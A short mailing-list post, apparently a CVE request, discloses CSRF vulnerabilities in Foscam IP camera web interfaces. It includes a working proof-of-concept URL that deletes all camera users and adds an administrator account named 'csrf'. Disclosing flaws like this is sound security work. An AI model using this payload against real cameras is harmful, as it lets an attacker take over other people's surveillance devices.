[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[CVE-REQUEST] Multiple CSRF vulnerabilities on Foscam IP cameras web UI



Embedded Web interface version  2.4.10.3 and older of Foscam FI8910W, FI8908W and many others is vulnerable to CSRF attacks. 
This allows attacker to perform calls to any CGI API using cached basic server authentication data stored in victims browser.
Details:
For example, the following URL requested by victims browser would wipe all user records and add 'csrf' user with administrator privileges:
http://cameraurl/set_users.cgi?user1=&pwd1=&pri1=2&user2=&pwd2=&pri2=&user3=&pwd3=&pri3=&user4=&pwd4=&pri4=&user5=&pwd5=&pri5=&user6=&pwd6=&pri6=&user7=&pwd7=&pri7=&user8=csrf&pwd8=csrf&pri8=2&next_url=

The CGI API manual for mentioned cameras is available at http://www.foscam.es/descarga/ipcam_cgi_sdk.pdf .